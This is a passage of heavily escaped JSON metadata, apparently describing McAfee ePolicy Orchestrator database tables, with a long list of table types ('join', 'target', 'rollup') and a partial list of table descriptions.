\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"Left join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\"\\r\\n\\t\\t]\"",
    "description": "\"[\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"McAfee Active Response Server Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Status of Discovery scans\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents Classification\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Volume properties specific to Volume from Amazon Web Service \\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Threat Events sent from managed systems.\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Allows you to query upon log entries created by a top-level task.\\\",\\r\\n\\t\\t\\t\\\"Info of Endpoint Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"Rolled up Applied Policies from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security \\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Installations\\\",\\r\\n\\t\\t\\t\\\"Tag Usage Description\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information from Groups\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Shows ePO-based DXL Client related properties\\\",\\r\\n\\t\\t\\t\\\"Active Response System\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information from Computer Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"AWS VPC Flow Logs with IP Reputation\\\",\\r\\n\\t\\t\\t\\\"Table that holds the Discover Server Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Endpoint System Adaptive Threat Protection Custom Properties\\\",\\r\\n\\t\\t\\t\\\"System properties specific to systems from Amazon Web Service \\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Tag Restrictions\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Retrieves more detailed information on Threat Events sent from managed systems\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"MVISION EDR Properties\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.NamedNetworkDescription\\\",\\r\\n\\t\\t\\t\\\"SessionRules_table_desc\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Instance assessment based on Agentless Firewall\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about what policies are applied to what managed systems.\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Source Application Information \\\",\\r\\n\\t\\t\\t\\\"Retrieves information about what policy assignments are broken in the system hierarchy.\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"System properties specific to systems from OpenStack Cloud (Generic)\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"McAfee Advanced Threat Defense Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Rules\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Remediation Event Description\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Platform properties from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Retrieves data on repositories and their status.\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Properties\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Status of Discovery scans\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about Adaptive Threat Protection events from managed systems.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Scan \\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Rolled up Applied Client Tasks from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Custom Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about firewall rules created on client systems and in the catalog.\\\",\\r\\n\\t\\t\\t\\\"Security Incident Description\\\",\\r\\n\\t\\t\\t\\\"Web Control Events\\\",\\r\\n\\t\\t\\t\\\"Email - All 